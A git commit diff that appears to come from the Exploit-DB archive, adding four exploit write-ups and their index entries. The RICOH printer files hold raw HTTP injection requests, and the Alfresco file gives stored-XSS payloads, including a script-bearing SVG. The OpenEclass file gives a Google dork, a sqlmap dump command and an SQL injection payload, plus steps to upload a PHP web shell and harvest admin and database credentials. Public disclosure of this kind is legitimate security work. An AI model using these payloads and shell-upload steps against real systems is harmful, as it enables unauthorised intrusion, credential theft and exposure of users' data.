DB: 2020-03-04
4 changes to exploits/shellcodes RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection Alfresco 5.2.4 - Persistent Cross-Site Scripting GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
This commit is contained in:
parent
afe5797b88
commit
d85ad29bbc
5 changed files with 345 additions and 0 deletions
73
exploits/hardware/webapps/48161.txt
Normal file
73
exploits/hardware/webapps/48161.txt
Normal file
|
@ -0,0 +1,73 @@
|
|||
# Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
|
||||
# Discovery by: Paulina Girón
|
||||
# Discovery Date: 2020-03-02
|
||||
# Vendor Homepage: https://www.ricoh.com/
|
||||
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re2/model/sp52s/sp52s.htm
|
||||
# Product Version: RICOH Aficio SP 5200S Printer
|
||||
# Vulnerability Type: Code Injection - HTML Injection
|
||||
|
||||
# Steps to Produce the HTML Injection:
|
||||
|
||||
#1.- HTTP POST Request 'adrsGetUser.cgi':
|
||||
|
||||
POST /web/entry/es/address/adrsGetUser.cgi HTTP/1.1
|
||||
Host: xxx.xxx.xxx.xxx
|
||||
Content-Length: 447
|
||||
Cache-Control: max-age=0
|
||||
Origin: http://xxx.xxx.xxx.xxx
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsList.cgi
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: es-ES,es;q=0.9
|
||||
Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
|
||||
Connection: close
|
||||
|
||||
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=13&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00005=ADRS_ENTRY_USER&00006=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00009=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER
|
||||
|
||||
#HTTP Response :
|
||||
|
||||
HTTP/1.0 200 OK
|
||||
Date: Mon, 02 Mar 2020 15:15:59 GMT
|
||||
Server: Web-Server/3.0
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Expires: Mon, 02 Mar 2020 15:15:59 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Set-Cookie: cookieOnOffChecker=on; path=/
|
||||
Connection: close
|
||||
|
||||
|
||||
|
||||
#2.- HTTP POST Request 'adrsSetUser.cgi':
|
||||
|
||||
POST /web/entry/es/address/adrsSetUser.cgi HTTP/1.1
|
||||
Host: xxx.xxx.xxx.xxx
|
||||
Content-Length: 611
|
||||
Cache-Control: max-age=0
|
||||
Origin: http://xxx.xxx.xxx.xxx
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsGetUser.cgi
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: es-ES,es;q=0.9
|
||||
Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
|
||||
Connection: close
|
||||
|
||||
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00012&entryNameIn=prueba&entryDisplayNameIn=prueba&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
|
||||
|
||||
#HTTP Response :
|
||||
|
||||
HTTP/1.0 200 OK
|
||||
Date: Mon, 02 Mar 2020 15:17:10 GMT
|
||||
Server: Web-Server/3.0
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Expires: Mon, 02 Mar 2020 15:17:10 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Set-Cookie: cookieOnOffChecker=on; path=/
|
||||
Connection: close
|
73
exploits/hardware/webapps/48164.txt
Normal file
73
exploits/hardware/webapps/48164.txt
Normal file
|
@ -0,0 +1,73 @@
|
|||
# Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
|
||||
# Discovery by: Olga Villagran
|
||||
# Discovery Date: 2020-03-02
|
||||
# Vendor Homepage: https://www.ricoh.com/
|
||||
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/rc3/model/sp52s/sp52s.htm?lang=es
|
||||
# Product Version: RICOH Aficio SP 5210SF Printer
|
||||
# Vulnerability Type: Code Injection - HTML Injection
|
||||
|
||||
# Steps to Produce the HTML Injection:
|
||||
|
||||
#1.- HTTP POST Request 'adrsGetUser.cgi':
|
||||
|
||||
POST /web/entry/en/address/adrsGetUser.cgi HTTP/1.1
|
||||
Host: xxx.xxx.xxx.xxx
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsList.cgi
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 402
|
||||
Connection: close
|
||||
Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=8&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER&00012=ADRS_ENTRY_USER
|
||||
|
||||
|
||||
#HTTP Response :
|
||||
|
||||
HTTP/1.0 200 OK
|
||||
|
||||
Date: Mon, 02 Mar 2020 22:22:44 GMT
|
||||
Server: Web-Server/3.0
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Expires: Mon, 02 Mar 2020 22:22:44 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Set-Cookie: cookieOnOffChecker=on; path=/
|
||||
Connection: close
|
||||
|
||||
|
||||
#2.- HTTP POST Request 'adrsSetUser.cgi':
|
||||
|
||||
|
||||
POST /web/entry/en/address/adrsSetUser.cgi HTTP/1.1
|
||||
Host: xxx.xxx.xxx.xxx
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsGetUser.cgi
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 607
|
||||
Connection: close
|
||||
Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00005&entryNameIn=test&entryDisplayNameIn=test&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
|
||||
|
||||
|
||||
#HTTP Response :
|
||||
|
||||
HTTP/1.0 200 OK
|
||||
|
||||
Date: Mon, 02 Mar 2020 22:23:10 GMT
|
||||
Server: Web-Server/3.0
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Expires: Mon, 02 Mar 2020 22:23:10 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Set-Cookie: cookieOnOffChecker=on; path=/
|
||||
Connection: close
|
79
exploits/php/webapps/48162.txt
Normal file
79
exploits/php/webapps/48162.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
# Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting
|
||||
# Date: 2020-03-02
|
||||
# Exploit Author: Romain LOISEL & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
|
||||
# Vendor Homepage: https://www.alfresco.com/
|
||||
# Software Link: https://www.alfresco.com/ecm-software
|
||||
# Version: Alfresco before 5.2.4
|
||||
# Tested on: 5.2.4
|
||||
# CVE : CVE-2020-8776, CVE-2020-8777, CVE-2020-8778
|
||||
# Security advisory: https://gitlab.com/snippets/1937042
|
||||
|
||||
|
||||
### Stored XSS n°1 - Document URL - CVE-2020-8776 (found by Alexandre ZANNI)
|
||||
|
||||
Each file has a set of properties than can be edited by any authenticated user
|
||||
that have write access on the project or the file.
|
||||
|
||||
The **URL** property of the file provided by the user is injected in the `href`
|
||||
attribute of the HTML link without a proper escaping.
|
||||
|
||||
- Where? In URL property
|
||||
- Payload: `" onmouseover="alert(document.cookie)"`
|
||||
- Details: On the document explorer, the value is injected in a span tag. But on the detailed view of the file, it's inserted in the `href` attribute of a `a` tag. `http://` is prefixed before the payload provided by the user but can be bypassed. The generated vulnerable link will look like that:
|
||||
```html
|
||||
<a target="_blank" href="http://" onmouseover="alert(document.cookie)" "=" ">http://" onmouseover="alert(document.cookie)"</a>
|
||||
```
|
||||
- Privileges: It requires write privileges to store it, any user with read access can see it.
|
||||
- Steps to reproduce:
|
||||
1. Go to _Document Library_
|
||||
2. Upload a file or click _Edit properties_ on an existing file
|
||||
3. Enter the payload in the URL property
|
||||
4. Click on the file title to go on the detailed page of the file
|
||||
5. Hover the displayed link to trigger the XSS
|
||||
|
||||
### Stored XSS n°2 - User profile photo upload / Document viewing - CVE-2020-8777 (found by Alexandre ZANNI)
|
||||
|
||||
There is no file restriction for photo uploading in the user profile page.
|
||||
Then the profile picture can be seen in the browser.
|
||||
|
||||
- Where? In user profile photo
|
||||
- Payload:
|
||||
```xml
|
||||
<?xml version="1.0" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
|
||||
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||||
<polygon id="triangle" points="0,0 0,200 200,200 200,0" fill="#FF6804" stroke="#000000"/>
|
||||
<script type="text/javascript">
|
||||
alert('XSS - Orange Cyberdefense');
|
||||
</script>
|
||||
</svg>
|
||||
```
|
||||
- Details: The XSS is not triggerred everywhere, only with the _View in browser_ feature.
|
||||
- Privileges: Any authenticated user can store it or trigger it.
|
||||
- Steps to reproduce:
|
||||
1. Go to your user profile page (`/share/page/user/<username>/profile`)
|
||||
2. In the _Photo_ section, click _Upload_ and upload the SVG payload file
|
||||
3. Use the document browser or any dashboard to find the uploaded file
|
||||
4. Click on the title to go to the detailed page of the file
|
||||
5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
|
||||
|
||||
### Stored XSS n°3 - Generic file upload / Document viewing - CVE-2020-8778 (found by Romain LOISEL)
|
||||
|
||||
This is the generic version of the previous XSS. Uploading dangerous file types
|
||||
is allowed and then they can be viewed to triggered the XSS. The difference
|
||||
between the two is that this one requires right access on a project to upload
|
||||
documents so the XSS is not exploitable with a read only account but the
|
||||
previous one can be exploited by any user as any user is allowed to have a
|
||||
profile photo.
|
||||
|
||||
- Where? Uploading a document anywhere
|
||||
- Payload: any file type that can store and execute a JavaScript payload (eg. HTML, SVG, XML, etc.)
|
||||
- Details: The XSS is triggerred only with the _View in browser_ feature.
|
||||
- Privileges: Any authenticated user with write access to a project can store it and any user that have read access to the file or project can trigger it.
|
||||
- Steps to reproduce:
|
||||
1. Go to a project dashboard
|
||||
2. IClick _Upload_ and upload a dangerous file
|
||||
3. Use the document browser or any dashboard to find the uploaded file
|
||||
4. Click on the title to go to the detailed page of the file
|
||||
5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
|
116
exploits/php/webapps/48163.txt
Normal file
116
exploits/php/webapps/48163.txt
Normal file
|
@ -0,0 +1,116 @@
|
|||
# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
|
||||
# Google Dork: intext:"© GUnet 2003-2007"
|
||||
# Date: 2020-03-02
|
||||
# Exploit Author: emaragkos
|
||||
# Vendor Homepage: https://www.openeclass.org/
|
||||
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
|
||||
# Version: 1.7.3 (2007)
|
||||
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
|
||||
# CVE : -
|
||||
|
||||
Older versions are also vulnerable.
|
||||
|
||||
Source code:
|
||||
http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
|
||||
http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
|
||||
|
||||
Setup instructions:
|
||||
http://download.openeclass.org/files/docs/1.7/Install.pdf
|
||||
|
||||
Changelog:
|
||||
https://download.openeclass.org/files/docs/1.7/CHANGES.txt
|
||||
|
||||
Manual:
|
||||
https://download.openeclass.org/files/docs/1.7/eClass.pdf
|
||||
|
||||
############################################################################
|
||||
|
||||
Unauthenticated Information Disclosure
|
||||
|
||||
System info
|
||||
127.0.0.1/modules/admin/sysinfo
|
||||
(powered by phpSysInfo 2.0 that is also vulnerable)
|
||||
|
||||
Web-App version info
|
||||
127.0.0.1/README.txt
|
||||
127.0.0.1/info/about.php
|
||||
127.0.0.1/upgrade/CHANGES.txt
|
||||
|
||||
############################################################################
|
||||
|
||||
(Authenticated - Requires student account) - Error-Based SQLi
|
||||
|
||||
https://127.0.0.1/modules/agenda/myagenda.php?month=3&year=2020
|
||||
|
||||
sqlmap -u "https://127.0.0.1/modules/agenda/myagenda.php?month=2&year=2020" --batch --dump
|
||||
|
||||
---
|
||||
Parameter: month (GET)
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: month=5' AND (SELECT 9183 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9183=9183,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Hztw&year=2020'
|
||||
---
|
||||
|
||||
Almost every parameter will be either error-based, boolean-based or time-based vulnerable.
|
||||
If you have a student account I recommend using this error-based SQLi because you will get all the database content really faster.
|
||||
If you dont have an account use the following exploit that exploits an unauthenticated time-based blind injection.
|
||||
It will definately be a slower proccess but you will get the administrator account pretty fast and move on with exploiting other authenticated vulnerabilities.
|
||||
https://www.exploit-db.com/exploits/48106
|
||||
|
||||
############################################################################
|
||||
|
||||
(Authenticated - Requires student account) - PHP upload file extension bypass
|
||||
If you have a student account you can bypass file extension restrictions and upload a PHP shell.
|
||||
Register as user if the application is configured to allow registrations or use an SQLi to find an account that already exists.
|
||||
Start looking for a class that you can submit an exercise as a student.
|
||||
Register in that class and navigate to submit you exercise.
|
||||
If you try to upload a .php file it will be renamed to .phps to prevent execution.
|
||||
You can upload your PHP shell by spoofing the extension simply by renaming your .php file to .php3 or .PhP
|
||||
Once you have uploaded it, open your course directory and then add "work" directory at the end
|
||||
Course link example: https://127.0.0.1/courses/CS101/
|
||||
Course link becomes: https://127.0.0.1/courses/CS101/work/
|
||||
Directory listing will most likely be enabled by default and you will be able to view the directories.
|
||||
Your shell will be in one of the multiple random alphanumeric directories that look like this /4a0c01h2nad9b/
|
||||
Final shell link will look like this: https://127.0.0.1/courses/CS101/work/4a0c01h2nad9b/shell.php3
|
||||
|
||||
The same method works with "groups" if you cant find a class that supports submitting an exercise.
|
||||
https://127.0.0.1/modules/group/group.php
|
||||
|
||||
############################################################################
|
||||
|
||||
(Authenticated - Requires student account) - View assessments of other students
|
||||
If you have a student account you can view uploaded assessments from other students before or after the deadline that the professor has set.
|
||||
Find the course link you are interested in.
|
||||
https://127.0.0.1/courses/CS101
|
||||
Add "work" directory at the end
|
||||
https://127.0.0.1/courses/CS101/work/
|
||||
Directory listing will most likely be enabled by default and you will be able to view and download other students' uploaded assessments.
|
||||
|
||||
############################################################################
|
||||
|
||||
(Authenticated - Requires admin account) - Upload PHP files
|
||||
|
||||
You have to login to the platform as an administrator or user with admin rights.
|
||||
You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the
|
||||
following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results.
|
||||
Once you have logged in as admin:
|
||||
1) Navigate to 127.0.0.1/modules/course_info/restore_course.php
|
||||
2) Upload your .php shell compressed in a .zip file
|
||||
3) Ignore the error message
|
||||
4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php
|
||||
|
||||
############################################################################
|
||||
|
||||
(Authenticated - Requires admin account) - phpMyAdmin Remote Access
|
||||
|
||||
127.0.0.1/modules/admin/mysql
|
||||
phpMyAdmin 2.10.0.2 is installed by default and allows remote logins
|
||||
Once you have uploaded your shell can view the config.php file that contains the mysql password
|
||||
127.0.0.1/config/config.php
|
||||
|
||||
############################################################################
|
||||
|
||||
(Authenticated - Requires admin account) - Plaintext password storage
|
||||
|
||||
When logged in as admin you can view all registered users credentials as plaintext.
|
||||
127.0.0.1/modules/admin/listusers.php
|
|
@ -42427,3 +42427,7 @@ id,file,description,date,author,type,platform,port
|
|||
48155,exploits/hardware/webapps/48155.py,"TP LINK TL-WR849N - Remote Code Execution",2020-03-02,"Elber Tavares",webapps,hardware,
|
||||
48158,exploits/hardware/webapps/48158.txt,"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)",2020-03-02,"Elber Tavares",webapps,hardware,
|
||||
48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,
|
||||
48161,exploits/hardware/webapps/48161.txt,"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection",2020-03-03,"Paulina Girón",webapps,hardware,
|
||||
48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
|
||||
48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
|
||||
48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue